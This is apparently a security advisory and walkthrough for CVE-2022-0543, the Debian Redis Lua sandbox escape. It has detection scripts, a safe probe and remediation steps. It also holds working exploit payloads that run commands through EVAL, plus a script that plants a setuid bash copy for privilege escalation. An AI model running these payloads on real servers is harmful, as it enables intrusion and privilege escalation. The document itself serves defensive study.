KEV Catalog: Debian-specific Redis Server Lua Sandbox Escape Vulnerability (CVE-2022-0543)

Known Vulnerability - Database

Debian-specific Redis Server Lua Sandbox Escape Vulnerability (CVE-2022-0543)

The CISA Known Exploited Vulnerabilities (KEV) Catalog lists vulnerabilities known to be exploited in the wild and is meant to drive remediation priority. Each entry carries a due date by which federal agencies must remediate, usually a few weeks after the entry is added. Monitoring the catalog and understanding how each vulnerability is exploited lets security teams judge the risk it poses to their own environments. CISA’s KEV Catalog Update Bulletin delivers new entries by subscription.

Date Added to KEV Catalog: March 03, 2022

CISA Due Date for Remediation: April 18, 2022

Vulnerability

Reginaldo Silva discovered a Debian-specific Lua sandbox escape in Redis, an in-memory key-value store with optional persistence. Silva’s original post explains CVE-2022-0543 and starts from how Redis and its Lua engine are meant to relate, namely that the engine is sandboxed:

 “Redis is a very widely used service for caching, but it’s also used as a message broker. Clients talk to a Redis server over a socket, send commands, and the server changes its state (i.e. its in-memory structures), in response to such commands. Redis embeds the Lua programming language as its scripting engine, which is made available through the eval command. The Lua engine is expected to be sandboxed, i.e., clients can interact with the Redis APIs from Lua, but should not be able to execute arbitrary code on the machine where Redis is running.” 

Silva goes on to explain why this turns into remote code execution on Debian. Upstream Redis compiles its bundled Lua into the server, but the Debian packaging builds Redis against the system liblua and loads it dynamically, and as a side effect of that packaging the Lua package library is left in the global environment of the scripting engine. An attacker who can send EVAL can therefore call package.loadlib to pull the io and os libraries (which the sandbox deliberately withholds) out of liblua itself and run arbitrary commands under whatever account redis-server runs as.

Systems Affected and Detection

Distribution and version: on Ubuntu the affected redis packages are those of Ubuntu 21.10 and Ubuntu 20.04 LTS; Debian published its own security advisory for its redis packages. The release can be read with lsb_release -a or from /etc/os-release (uname -a only reports the kernel version). What actually has to be compared against the advisory is the installed redis-server package version.

liblua library: the escape works by having package.loadlib load libraries out of the system liblua5.1, which is what the Debian build of redis-server links against, so confirm that shared library is present:

ls -al /usr/lib/x86_64-linux-gnu/liblua5.1.so* 

Redis server: Redis listens on port 6379 by default; the process and its listening socket can be seen with ps aux or netstat -plant.

The Redis command line client sends commands to the server and prints the replies:

redis-cli -h <IP>

A stock install requires no authentication, so anyone who can reach the port can issue EVAL. The Debian packages bind to 127.0.0.1 by default, so the remote case arises when bind has been widened or the service runs in a container with the port published.
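The checks above can be scripted. The following is an added example (not from the original article, nor from Redis or Debian) whose functions read the output of ldd and ss/netstat so they can be exercised offline. Whether redis-server is dynamically linked against the system liblua5.1 is the distinguishing mark of the Debian-style build that carries this bug, since upstream Redis compiles its bundled Lua statically. The function names and the sample command output are the example's own, constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the original article or from Redis/Debian.
# Host-side checks for CVE-2022-0543 preconditions. The functions read command
# output from stdin so they can be exercised on constructed samples.

# Upstream Redis compiles its bundled Lua into the binary; the Debian/Ubuntu
# packages link against the shared system liblua5.1 instead, which is the build
# this bug lives in. Succeeds when `ldd redis-server` output (stdin) shows it.
redis_links_system_lua() {
    grep -q 'liblua5\.1\.so'
}

# Succeeds when `ss -plnt` / `netstat -plnt` output (stdin) has a listener on
# port 6379 bound to anything other than a loopback address, i.e. reachable
# from other hosts. Column 4 is the local address in both tools.
redis_exposed_beyond_loopback() {
    awk '$4 ~ /:6379$/ && $4 !~ /^(127\.|\[::1\]|::1:|localhost)/ { found = 1 }
         END { exit found ? 0 : 1 }'
}

# Runs the real commands on this host and reports. Only invoked when the script
# is called with "run", so that sourcing the file has no side effects.
host_report() {
    bin=$(command -v redis-server) || { echo "redis-server not installed"; return 2; }
    if ldd "$bin" | redis_links_system_lua; then
        echo "redis-server links the system liblua5.1 (Debian-style build; compare package version with the advisory)"
    else
        echo "redis-server does not link the system liblua5.1 (not the Debian-specific build)"
    fi
    if ss -plnt 2>/dev/null | redis_exposed_beyond_loopback; then
        echo "port 6379 listens on a non-loopback address: reachable from the network"
    fi
    # Installed package version, to be compared with the fixed version in the DSA/USN.
    dpkg -l redis-server 2>/dev/null | awk '/^ii/ { print "installed: " $2 " " $3 }'
}

# Constructed sample output (not captured from a real host) for self-tests.
SAMPLE_LDD_DEBIAN='    linux-vdso.so.1 (0x00007ffd9f5f4000)
    liblua5.1.so.0 => /usr/lib/x86_64-linux-gnu/liblua5.1.so.0 (0x00007f2c3d0a7000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2c3ce8a000)'
SAMPLE_LDD_UPSTREAM='    linux-vdso.so.1 (0x00007ffd9f5f4000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2c3ce8a000)'
SAMPLE_SS_EXPOSED='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    0.0.0.0:6379        0.0.0.0:*         users:(("redis-server",pid=812,fd=6))'
SAMPLE_SS_LOCAL='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    127.0.0.1:6379      0.0.0.0:*         users:(("redis-server",pid=812,fd=6))
LISTEN 0      511    [::1]:6379          [::]:*            users:(("redis-server",pid=812,fd=7))'

if [ "${1:-}" = run ]; then host_report; fi
```

Run it as sh redis_check.sh run on the host being assessed. A positive liblua result only says the binary is the Debian-style build; whether it is a fixed or unfixed one is decided by the package version against the distribution advisory.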

Vulnerability Check  

Silva’s post shows that, once redis-cli is connected, the bug can be confirmed with a single eval: package.loadlib pulls luaopen_os out of liblua, calling the returned function yields a full os library, and os.execute runs touch to create /tmp/redis_poc on the server. The trailing 0 is EVAL’s mandatory number-of-keys argument:

eval 'local os_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_os"); local os = os_l(); os.execute("touch /tmp/redis_poc"); return 0' 0

The file is created by the Redis process, so it is owned by whatever account redis-server runs as. In a container that runs Redis as root (Vulhub’s does), /tmp/redis_poc is owned by root; the Debian and Ubuntu packages start redis-server as the unprivileged redis user, so there the file belongs to redis. Either way, the file appearing on the host proves that the script escaped the sandbox and executed an operating-system command.

You can check the ownership and permissions of the redis_poc file from a separate session with: ls -la /tmp/redis_poc

The same technique with the io library instead of os returns command output to the client, which shows directly which account the commands run as:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

In the Vulhub container the reply shows uid=0(root); against a packaged Debian or Ubuntu service it shows the redis user.
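Touching a file on the target is fine in a lab but not in a production scan. The following is an added example (not the article’s PoC and not Redis or Debian tooling) of a non-destructive probe: it asks the Lua engine what package is. A vulnerable Debian build answers with a Lua table; a correct sandbox has no such global and Redis raises its "nonexistent global variable" error instead. The verdict names, the function names and the sample replies are constructed for the example.

```shell
#!/bin/sh
# Added example, not the article's PoC or any Redis/Debian tooling.
# Non-destructive remote probe for CVE-2022-0543: instead of running a command,
# ask the sandbox whether the `package` global exists.

LUA_PROBE='return tostring(package)'

# Maps a redis-cli reply (passed as $1) to a verdict. Patterns are matched
# loosely so both --no-raw (quoted) and raw redis-cli output are handled.
classify_eval_reply() {
    case "$1" in
        *"table: 0x"*)                              echo VULNERABLE ;;    # package global exposed
        *"nonexistent global variable 'package'"*)  echo PATCHED ;;       # sandbox intact
        *NOAUTH*)                                   echo AUTH_REQUIRED ;; # requirepass/ACL set; retry with -a
        *"unknown command"*)                        echo EVAL_DISABLED ;; # EVAL renamed away with rename-command
        *"Could not connect"*|*"Connection refused"*) echo UNREACHABLE ;;
        *)                                          echo UNKNOWN ;;
    esac
}

# probe_redis HOST [PORT]: sends the probe with redis-cli and prints the verdict.
# Pass the password via REDISCLI_AUTH (or add -a) when the server requires it.
probe_redis() {
    host=$1; port=${2:-6379}
    reply=$(redis-cli -h "$host" -p "$port" --no-raw eval "$LUA_PROBE" 0 2>&1)
    echo "$host:$port $(classify_eval_reply "$reply")"
}

# Constructed sample replies (the script SHA is made up) for self-tests.
SAMPLE_REPLY_VULN='"table: 0x55c7f0c4a3b0"'
SAMPLE_REPLY_PATCHED="(error) ERR Error running script (call to f_2b1fd0dabbf0f1ef8c1e2de1c2e6a1b1d8a7e4a3): @user_script:1: Script attempted to access nonexistent global variable 'package'"
SAMPLE_REPLY_NOAUTH='(error) NOAUTH Authentication required.'

if [ $# -gt 0 ]; then probe_redis "$@"; fi
```

Usage: sh redis_probe.sh <IP> [port]. PATCHED here means only that the package global is absent, which is the state of both the fixed Debian packages and upstream Redis; AUTH_REQUIRED and EVAL_DISABLED are not verdicts about the bug, just about what is standing in front of it.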

Tenable’s Ubuntu Local Security Checks and Debian Local Security Checks plugins should also be able to detect for CVE-2022-0543.  

Exploitation

Any command can be run through the same io.popen primitive, so the escape is full remote code execution as the Redis service account. Vulhub on GitHub provides a Docker environment for this CVE (it runs Redis as root), which is what the walk-through below uses.

Instead of id, substitute a command that copies /bin/bash somewhere world-accessible and marks the copy setuid:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("<commands>", "r"); local res = f:read("*a"); f:close(); return res' 0

The copy is created and chmod +s is applied by the Redis process, so the setuid bit refers to the account Redis runs as. Any local user can then execute the copy; bash normally drops a setuid effective uid at startup, so it has to be run with the -p option to keep it.

The result is a local privilege escalation: a user with only a low-privileged account on the host, plus the ability to reach the Redis port, gets a shell as the account Redis runs under. That is root only when Redis itself runs as root, as in the Vulhub container; against the stock Debian or Ubuntu service the same chain yields the redis user.
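The template above with <commands> filled in, plus the defender’s counterpart, as an added example that is not from the article, Vulhub or Metasploit. It generalises the io.popen template into a function that runs any shell command through the escape (escaping quotes for the Lua string literal), stages the setuid copy only after first reporting which account Redis runs as, and adds a hunt for the setuid shell copy that this chain leaves behind. The function names and the liblua path default are the example’s own.

```shell
#!/bin/sh
# Added example, not from the article, Vulhub or Metasploit.
# Generalised form of the io.popen escape for CVE-2022-0543, and the matching
# hunt for the setuid shell copy it leaves on disk.

LIBLUA=/usr/lib/x86_64-linux-gnu/liblua5.1.so.0   # Debian/Ubuntu path used by the PoC

# Builds the Lua body for EVAL: loads luaopen_io out of liblua via the exposed
# package.loadlib, runs $1 with io.popen and returns its output. Backslashes
# and double quotes in the command are escaped for the Lua string literal.
lua_popen_script() {
    esc=$(printf '%s' "$1" | sed 's/[\\"]/\\&/g')
    printf 'local io_l = package.loadlib("%s", "luaopen_io"); local io = io_l(); local f = io.popen("%s", "r"); local res = f:read("*a"); f:close(); return res' "$LIBLUA" "$esc"
}

# run_via_redis HOST CMD: executes CMD on the Redis host as the redis-server account.
run_via_redis() {
    redis-cli -h "$1" --no-raw eval "$(lua_popen_script "$2")" 0
}

# Stage 1 reports which account Redis runs as; stage 2 plants a setuid copy of
# bash. The copy is root-privileged only if stage 1 showed uid=0 (as in the
# Vulhub container); on a packaged install it yields the redis user instead.
plant_setuid_bash() {
    run_via_redis "$1" 'id'
    run_via_redis "$1" 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash && ls -l /tmp/bash'
    # A local user then runs:  /tmp/bash -p   (-p keeps the file owner's euid)
}

# Defender side: list setuid regular files under the given directories, one
# path per line. World-writable locations are where such copies land.
hunt_setuid_shells() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null
}

case "${1:-}" in
    exploit) plant_setuid_bash "$2" ;;
    hunt)    hunt_setuid_shells /tmp /var/tmp /dev/shm ;;
esac
```

Usage: sh redis_escape.sh exploit <IP> in a lab, and sh redis_escape.sh hunt on a host suspected of having been hit. A setuid bash in /tmp is a strong indicator on its own; checking its owner tells you whether the service ran as root.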

On April 28, 2022, Rapid7 released a Metasploit module for this issue, Redis Lua Sandbox Escape. InfosecMatter provides guidance on using the module and two ways to set up a vulnerable environment.

Remediation

Install the fixed redis packages from the Debian or Ubuntu security repositories and restart redis-server; the running process keeps the old code until it is restarted. The fix is in the redis package (the Debian build no longer exposes the package global to scripts), not in liblua, so upgrading liblua5.1 on its own changes nothing. Until the update is applied, reduce exposure: bind Redis to 127.0.0.1 or a private interface, require authentication (requirepass, or ACLs on Redis 6 and later), rename or disable EVAL and EVALSHA with rename-command, filter port 6379 at the network edge, and do not run redis-server as root. The Tenable local checks mentioned above can confirm the package version after patching.
